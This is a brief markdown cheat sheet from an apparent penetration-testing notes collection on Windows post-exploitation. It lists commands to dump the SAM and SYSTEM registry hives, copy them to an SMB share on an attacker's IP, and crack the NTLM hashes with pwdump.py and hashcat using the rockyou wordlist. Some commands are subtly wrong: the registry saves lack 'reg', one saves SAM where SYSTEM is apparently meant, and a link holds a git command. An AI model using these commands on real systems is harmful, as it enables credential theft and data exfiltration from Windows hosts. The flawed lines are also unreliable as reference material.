killchain-compendium/Post Exploitation/Windows/Powershell.md

Powershell

HashDump

save HKLM\SAM C:\Users\Administrator\Desktop\SAM
save HKLM\SAM C:\Users\Administrator\Desktop\System

• Use samdump2

Extract Hashes

• Extract via smb server on attacker

copy C:\Windows\Repair\SAM \\<attacker-IP>\dir\
copy C:\Windows\Repair\SYSTEM \\<attacker-IP>\dir\

• Crack via [creddump7](git clone https://github.com/Tib3rius/creddump7)

python pwdump.py SYSTEM SAM

or

hashcat -m 1000 --force <hash> /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt